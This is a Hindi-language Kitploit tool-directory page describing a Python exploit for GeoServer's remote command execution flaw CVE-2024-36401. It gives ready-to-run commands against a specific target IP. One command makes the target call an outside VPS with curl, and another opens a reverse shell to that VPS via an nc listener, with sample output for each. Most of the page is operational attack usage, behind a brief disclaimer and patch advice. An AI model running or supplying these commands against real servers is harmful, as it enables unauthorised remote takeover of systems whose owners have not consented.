Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-36401 — "GeoServer" के लिए एक Python एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/urjack2025/cve-2024-36401
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHuburjack2025/cve-2024-36401

CVE-2024-36401

"GeoServer" के लिए एक Python एक्सप्लॉइट

रिपॉजिटरी देखें
270 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-36401 GeoServer भेद्यता शोषण उपकरण

भेद्यता परिचय

CVE-2024-36401 GeoServer में एक रिमोट कमांड निष्पादन भेद्यता है, जिसके माध्यम से हमलावर विशेष WFS (Web Feature Service) अनुरोध तैयार करके बिना प्राधिकरण के मनमाना कमांड निष्पादित कर सकते हैं।

पर्यावरण आवश्यकताएँ

  • Python 3.x
  • आवश्यक निर्भरताएँ स्थापित करें: pip install requests

उपयोग विधि

यह उपकरण दो उपयोग मोड का समर्थन करता है: cmd मोड (सीधे कमांड निष्पादित करना) और reverse मोड (रिवर्स शेल स्थापित करना)।

1. परीक्षण करें कि लक्ष्य बाहरी नेटवर्क तक पहुँच सकता है या नहीं

मान लें कि VPS पता 111.46.112.85 है, cmd मोड का उपयोग करके curl कमांड निष्पादित करें, यह परीक्षण करने के लिए कि लक्ष्य सर्वर बाहरी नेटवर्क तक पहुँच सकता है या नहीं:

python exp.py cmd "8.147.134.121:32831" "curl http://111.46.112.85:8090/hello"

सत्यापन विधि: VPS पर अनुरोध प्राप्त करने के लिए HTTP सर्वर प्रारंभ करें

# 在 VPS 上执行
python -m http.server 8090

यदि कॉलबैक सफलतापूर्वक प्राप्त होता है, तो आपको निम्न जैसा आउटपुट दिखाई देगा:

Serving HTTP on 0.0.0.0 port 8090 (http://0.0.0.0:8090/) ...
39.106.20.178 - - [04/Oct/2025 17:22:30] code 404, message File not found
39.106.20.178 - - [04/Oct/2025 17:22:30] "GET /hello HTTP/1.1" 404 -

2. रिवर्स शेल कनेक्शन स्थापित करना

reverse मोड का उपयोग करके निर्दिष्ट VPS और पोर्ट पर रिवर्स शेल कनेक्शन स्थापित करें:

चरण 1: VPS पर लिसनिंग पोर्ट सेट करें

# 在 VPS 上执行
nc -lvp 6666

चरण 2: भेद्यता शोषण उपकरण चलाकर रिवर्स कनेक्शन आरंभ करें

python exp.py reverse "8.147.134.121:32831" 111.46.112.85 6666

निष्पादन के बाद, उपकरण निम्न जैसा आउटपुट प्रदर्शित करेगा:

[+] Response Status: 400
[+] Response Length: 1121
<?xml version="1.0" encoding="UTF-8"?><ows:ExceptionReport xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:ows="http://www.opengis.net/ows/1.1" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" version="2.0.0" xsi:schemaLocation="http://www.opengis.net/ows/1.1 http://8.147.134.121:32831/geoserver/schemas/ows/1.1.0/owsAll.xsd">
<ows:Exception exceptionCode="NoApplicableCode">
<ows:ExceptionText>java.lang.ClassCastException: class java.lang.ProcessImpl cannot be cast to class org.opengis.fea

इस समय, यदि शोषण सफल होता है, तो VPS पर nc लिसनिंग को रिवर्स शेल सत्र प्राप्त होगा।

उपकरण पैरामीटर विवरण

Usage:
  python exp.py cmd <target> <command>
  python exp.py reverse <target> <vps_ip> <vps_port>
  • cmd: एकल कमांड निष्पादन मोड
  • reverse: रिवर्स शेल मोड
  • <target>: लक्ष्य सर्वर का पता और पोर्ट, प्रारूप ip:port
  • <command>: लक्ष्य सर्वर पर निष्पादित किया जाने वाला कमांड
  • <vps_ip>: VPS सर्वर का IP पता
  • <vps_port>: VPS पर लिसनिंग पोर्ट नंबर

भेद्यता सिद्धांत

यह भेद्यता GeoServer WFS सेवा में सुरक्षा दोष का फायदा उठाती है, valueReference में Java कोड इंजेक्ट करके सिस्टम कमांड निष्पादित करती है। उपकरण दुर्भावनापूर्ण कोड युक्त XML Payload तैयार करके उसे GeoServer के WFS इंटरफ़ेस पर भेजता है, जिससे रिमोट कमांड निष्पादन संभव होता है।

सावधानियाँ

  1. यह उपकरण केवल सुरक्षा अनुसंधान और भेद्यता सत्यापन के लिए है, कृपया अनधिकृत परीक्षण के लिए उपयोग न करें।
  2. इस उपकरण के उपयोग से होने वाले किसी भी परिणाम की जिम्मेदारी उपयोगकर्ता स्वयं वहन करेगा।
  3. रिवर्स शेल सुविधा का उपयोग करते समय, सुनिश्चित करें कि आपके पास लक्ष्य प्रणाली तक पहुँचने की अनुमति है और आप संबंधित कानूनों और विनियमों द्वारा अनुमत दायरे में कार्य कर रहे हैं।
  4. यदि यह रेंज परीक्षण वातावरण है, तो रेंज निर्माता कठिनाई बढ़ाने के लिए कुछ डिफ़ॉल्ट रूट संशोधित कर सकता है, जिससे लाया गया EXP उपयोग नहीं हो पाता। इस स्थिति में, फ़ील्ड /geoserver/wfs को संबंधित सामग्री में संशोधित करने की आवश्यकता हो सकती है।

सुधार सुझाव

GeoServer को आधिकारिक रूप से जारी सुरक्षित संस्करण में समय पर अपडेट करें, और सुरक्षा सर्वोत्तम प्रथाओं के अनुसार सर्वर कॉन्फ़िगर करें।

टूल डाउनलोड करें